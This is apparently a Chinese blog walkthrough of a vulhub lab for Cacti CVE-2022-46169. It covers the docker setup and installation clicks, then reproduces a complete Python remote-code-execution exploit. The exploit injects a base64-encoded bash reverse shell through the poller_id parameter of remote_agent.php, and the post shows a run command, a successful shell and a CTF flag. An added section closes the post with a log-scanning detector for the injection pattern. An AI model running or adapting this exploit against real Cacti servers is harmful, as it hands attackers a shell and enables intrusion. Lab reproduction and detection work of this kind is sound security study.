
Date: 2025/7/10 0:21:27 Source: https://blog.csdn.net/aihua002/article/details/144438223

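Environment setup

# git clone is slow, so download the archive vulhub-master.zip with a browser from
# https://github.com/vulhub/vulhub
# Upload vulhub-master.zip to the VPS
rz -E
# Unpack it
unzip vulhub-master.zip -d ./
# Deploy the lab environment
cd vulhub-master/cacti/CVE-2022-46169
docker-compose up -d
# Check the container details
docker ps
# The container details show the following port mapping, so the lab is reachable on port 8080 of the host
0.0.0.0:8080->80/tcp, :::8080->80/tcp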

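Browse to http://172.25.254.139:8080

The default username and password are admin/admin

Then click Begin

Next

Next

Next

Next

Tick the checkbox, then Next

Keep the defaults, then Next

Next

Next

Tick the checkbox, then Install

Installation in progress

Get Started

Before exploiting this vulnerability, add a new graph under "graphs", because the vulnerability requires a poller item that uses POLLER_ACTION_SCRIPT_PHP

Select "Device - Uptime" as the Graph Type and click Create

Start an nc listener

Run the script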

# https://www.exploit-db.com/exploits/51166
# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)
# Exploit Author: Riadh BOUCHAHOUA
# Discovery Date: 2022-12-08
# Vendor Homepage: https://www.cacti.net/
# Software Links : https://github.com/Cacti/cacti
# Tested Version: 1.2.2x <= 1.2.22
# CVE: CVE-2022-46169
# Tested on OS: Debian 10/11

# !/usr/bin/env python3
import random
import sys

import httpx, urllib


class Exploit:
    def __init__(self, url, proxy=None, rs_host="", rs_port=""):
        self.url = url
        self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()}, verify=False)
        self.rs_host = rs_host
        self.rs_port = rs_port

    def exploit(self):
        # cacti local ip from the url for the X-Forwarded-For header
        # local_cacti_ip  = self.url.split("//")[1].split("/")[0]
        local_cacti_ip = '127.0.0.1'

        headers = {'X-Forwarded-For': f'{local_cacti_ip}'}

        revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"
        import base64
        b64_revshell = base64.b64encode(revshell.encode()).decode()
        payload = f";echo {b64_revshell} | base64 -d | bash -"
        payload = urllib.parse.quote(payload)
        urls = []

        # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)
        for host_id in range(1, 100):
            for local_data_ids in range(1, 100):
                urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")

        for url in urls:
            try:
                print("[*]try: {}".format(urllib.parse.unquote(url)))
                r = self.session.get(url, headers=headers)
                print(f"{r.status_code} - {r.text}")
            except Exception as e:
                print(e)
                sys.exit()
                pass

    def random_user_agent(self):
        ua_list = [
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
        ]
        return random.choice(ua_list)


def parse_args():
    import argparse

    argparser = argparse.ArgumentParser()
    argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")
    argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)
    argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)
    return argparser.parse_args()


def main() -> None:
    # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL
    args = parse_args()
    e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)
    e.exploit()


if __name__ == "__main__":
    main()

python CVE-2022-46169.py -u http://172.25.254.139:8080 -i 172.25.254.132 -p 5555

The reverse shell connects back successfully

flag

flag{566c99f4df83cde0677f4639641b9c01}
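
On the detection side, the script above leaves a recognisable trace: polldata requests to remote_agent.php whose poller_id carries extra characters after the number, repeated across many host_id and local_data_ids values. The following is an added example, not part of the original post or of Cacti; it scans access-log lines for that pattern, and the log format, sample lines and function names are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in "combined" access-log style (assumption: the web
# server in front of Cacti logs the full request line, query string included).
SAMPLE_LOG = """\
172.25.254.1 - - [10/Jul/2025:00:20:01 +0000] "GET /remote_agent.php?action=polldata&local_data_ids[]=6&host_id=1&poller_id=1 HTTP/1.1" 200 54 "-" "-"
172.25.254.132 - - [10/Jul/2025:00:21:02 +0000] "GET /remote_agent.php?action=polldata&local_data_ids[]=1&host_id=1&poller_id=1%3Becho%20QUJD%20%7C%20base64%20-d HTTP/1.1" 200 54 "-" "Mozilla/5.0"
172.25.254.132 - - [10/Jul/2025:00:21:03 +0000] "GET /remote_agent.php?action=polldata&local_data_ids[]=2&host_id=1&poller_id=1%3Becho%20QUJD%20%7C%20base64%20-d HTTP/1.1" 200 54 "-" "Mozilla/5.0"
172.25.254.1 - - [10/Jul/2025:00:22:00 +0000] "GET /graph_view.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
NUMERIC_PARAMS = ("poller_id", "host_id", "local_data_ids[]")


def suspicious_polldata(log_text):
    """Return (client, parameter, decoded value) for every polldata request
    whose numeric parameters hold anything other than ASCII digits."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/remote_agent.php"):
            continue
        # parse_qs percent-decodes names and values, so %3B shows up as ';'
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("action") != ["polldata"]:
            continue
        for name in NUMERIC_PARAMS:
            for value in params.get(name, []):
                if not re.fullmatch(r"[0-9]+", value):
                    hits.append((client, name, value))
    return hits


def hits_per_client(hits):
    """Count hits per source address; a sweep over ids yields many from one client."""
    return dict(Counter(client for client, _, _ in hits))


if __name__ == "__main__":
    found = suspicious_polldata(SAMPLE_LOG)
    for client, name, value in found:
        print(f"{client} {name}={value!r}")
    print(hits_per_client(found))
```

If the log format also records the X-Forwarded-For header, a polldata request from an external address that claims 127.0.0.1 is a second signal, since the script sets that header on every request.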
